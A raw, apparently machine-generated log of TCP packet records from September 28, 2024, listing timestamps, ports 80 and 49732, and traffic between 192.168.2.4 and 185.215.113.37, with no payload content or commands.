Sep 28, 2024 21:26:17.284043074 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.284048080 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.284126997 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.284162998 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.284246922 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.284256935 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.284266949 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.284276009 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.284286976 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.284296989 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.284307957 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.284317017 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.284317017 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.284358978 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.284358978 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.284465075 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.284507990 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.285140991 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.285197020 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.285237074 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.285248041 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.285258055 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.285269022 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.285307884 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.285307884 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.285715103 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.285726070 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.285737038 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.285764933 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.285794973 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.287173033 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.287228107 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.287252903 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.287267923 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.287306070 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.287338018 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.287353039 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.287364960 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.287421942 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.287457943 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.287468910 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.287477970 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.287488937 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.287529945 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.287529945 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.287681103 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.287692070 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.287702084 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.287712097 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.287723064 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.287733078 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.287738085 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.287770987 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.287790060 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.288393021 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.288431883 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.288443089 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.288448095 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.288477898 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.288598061 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.288609028 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.288619041 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.288629055 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.288639069 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.288661003 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.288700104 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.288700104 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.288825989 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.288836002 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.288851023 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.288860083 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.288871050 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.288881063 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.288901091 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.288901091 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.288938046 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.289088964 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289100885 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289110899 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289122105 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289151907 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.289151907 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.289185047 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.289354086 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289366007 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289381027 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289390087 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289406061 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289408922 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.289417028 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289428949 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289429903 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.289442062 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289447069 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.289484978 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.289505005 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.289518118 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289529085 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289552927 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289563894 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289566040 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.289573908 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289586067 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289602041 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.289638042 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.289638042 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.289777994 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289789915 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289798975 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289809942 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289844036 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.289844036 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.289880037 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.289937973 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289953947 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289966106 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289975882 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289987087 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.289988041 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.289988041 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.289998055 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290021896 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290021896 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.290030956 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290041924 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290051937 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.290052891 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290051937 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.290065050 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290077925 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290081978 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.290088892 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290101051 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290102005 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.290117979 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290121078 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.290143967 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.290163040 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.290533066 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290544987 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290554047 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290565014 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290575981 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290585995 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290590048 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.290596008 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290607929 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290608883 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.290617943 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290627956 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.290631056 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290641069 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290648937 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.290652990 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290673018 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.290699959 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.290896893 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290908098 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290918112 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290925980 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290945053 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.290946007 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290957928 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290967941 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290980101 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.290986061 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.290986061 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.290991068 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.291006088 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.291014910 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.291016102 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.291014910 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.291029930 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.291038990 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.291040897 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.291053057 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.291062117 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.291086912 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.291349888 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.291361094 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.291369915 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.291379929 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.291394949 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.291420937 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.291420937 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.291444063 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.511234045 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.511253119 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.511264086 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.511341095 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.511393070 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.511404037 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.511414051 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.511415958 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.511425972 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.511435986 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.511452913 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.511481047 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.511570930 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.511581898 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.511590958 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.511601925 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.511611938 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.511621952 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.511627913 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.511636972 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.511639118 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.511639118 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.511648893 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.511667967 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.511682987 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.511710882 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.512026072 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512037039 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512047052 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512056112 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512067080 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512068033 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.512077093 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512089014 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.512092113 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512103081 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512115002 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.512134075 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.512267113 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512327909 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.512449026 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512459040 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512468100 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512480974 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512495995 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.512497902 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512509108 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512516975 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.512521982 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512535095 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512535095 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.512546062 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512552023 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.512557030 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512568951 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512576103 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.512581110 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512593031 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512605906 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.512623072 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.512634039 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512643099 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.512648106 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512676954 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.512707949 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.512839079 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512850046 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512865067 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.512883902 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.512917042 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.512917042 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.513360023 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.513370991 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.513426065 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.513427019 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.513539076 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.513555050 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.513566017 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.513575077 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.513583899 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.513592005 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.513592005 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.513593912 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.513605118 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.513612986 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.513614893 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.513629913 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.513648033 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.513684034 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.513684034 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.513725042 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.513736963 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.513746023 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.513756990 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.513766050 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.513777018 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.513780117 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.513780117 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.513787985 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.513804913 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.513814926 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.513823032 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.513824940 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.513844967 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.513881922 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.513881922 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.514554977 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.514566898 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.514576912 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.514586926 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.514597893 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.514600992 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.514610052 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.514621973 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.514621973 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.514642000 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.514672041 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.514691114 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.514739990 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.514750957 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.514760017 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.514770985 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.514781952 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.514781952 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.514795065 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.514806986 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.514808893 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.514808893 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.514818907 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.514832020 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.514851093 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.514884949 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.514884949 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.514890909 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.514904976 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.514914036 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.514930010 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.514936924 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.514942884 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.514959097 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.514976978 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.515026093 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.515583992 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.515595913 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.515625000 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.515661001 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.515767097 CEST	80	49732	185.215.113.37	192.168.2.4
